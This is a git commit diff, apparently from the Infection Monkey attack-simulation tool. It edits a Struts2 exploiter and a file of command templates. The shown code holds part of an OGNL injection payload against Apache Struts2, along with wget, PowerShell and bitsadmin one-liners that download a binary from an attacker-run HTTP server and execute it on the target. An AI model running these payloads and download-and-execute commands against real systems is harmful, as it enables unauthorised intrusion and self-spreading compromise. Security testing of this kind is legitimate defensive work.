Fixed some bugs and more notes

This commit is contained in:
Vakaris 2018-06-25 18:26:34 +03:00
parent 81712ddbf0
commit 671452243d
2 changed files with 10 additions and 10 deletions

View File

@ -12,7 +12,7 @@ import logging
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import get_target_monkey, get_monkey_depth from exploit.tools import get_target_monkey, get_monkey_depth
from tools import build_monkey_commandline, HTTPTools from tools import build_monkey_commandline, HTTPTools
from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, DROPPER_ARG from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP_BITS_DROPPER
__author__ = "VakarisZ" __author__ = "VakarisZ"
@ -20,9 +20,6 @@ LOG = logging.getLogger(__name__)
DOWNLOAD_TIMEOUT = 300 DOWNLOAD_TIMEOUT = 300
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
class Struts2Exploiter(HostExploiter): class Struts2Exploiter(HostExploiter):
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
@ -47,7 +44,8 @@ class Struts2Exploiter(HostExploiter):
if port[1]: if port[1]:
current_host = "https://%s:%s" % (self.host.ip_addr, port[0]) current_host = "https://%s:%s" % (self.host.ip_addr, port[0])
else: else:
current_host = "http://%s:%s" % (self.host.ip_addr, port[0]) # TODO remove struts
current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0])
# Get full URL # Get full URL
url = self.get_redirected(current_host) url = self.get_redirected(current_host)
LOG.info("Trying to exploit with struts2") LOG.info("Trying to exploit with struts2")
@ -87,7 +85,7 @@ class Struts2Exploiter(HostExploiter):
return False return False
LOG.info("Started http server on %s", http_path) LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path)
command = WGET_HTTP % {'monkey_path': dropper_path, command = WGET_HTTP % {'monkey_path': dropper_path,
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
@ -135,12 +133,13 @@ class Struts2Exploiter(HostExploiter):
return False return False
LOG.info("Started http server on %s", http_path) LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) # We need to double escape backslashes. Once for payload, twice for command
cmdline = re.sub(r"\\", r"\\\\", build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path))
command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
backup_command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), backup_command = RDP_CMDLINE_HTTP_BITS_DROPPER % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
resp = self.exploit(url, command) resp = self.exploit(url, command)
@ -196,8 +195,6 @@ class Struts2Exploiter(HostExploiter):
:param cmd: Code to try and execute on host :param cmd: Code to try and execute on host
:return: response :return: response
""" """
page = ""
payload = "%%{(#_='multipart/form-data')." \ payload = "%%{(#_='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?" \ "(#_memberAccess?" \

View File

@ -19,8 +19,11 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
# Commands used for downloading monkeys # Commands used for downloading monkeys
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, ) POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, ) WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
RDP_CMDLINE_HTTP_BITS_DROPPER = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
# Commands used to check for architecture and if machine is exploitable # Commands used to check for architecture and if machine is exploitable
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
CHECK_LINUX = "echo %s && lscpu" % ID_STRING CHECK_LINUX = "echo %s && lscpu" % ID_STRING
# Commands used to check if monkeys already exists # Commands used to check if monkeys already exists
EXISTS = "ls %s" EXISTS = "ls %s"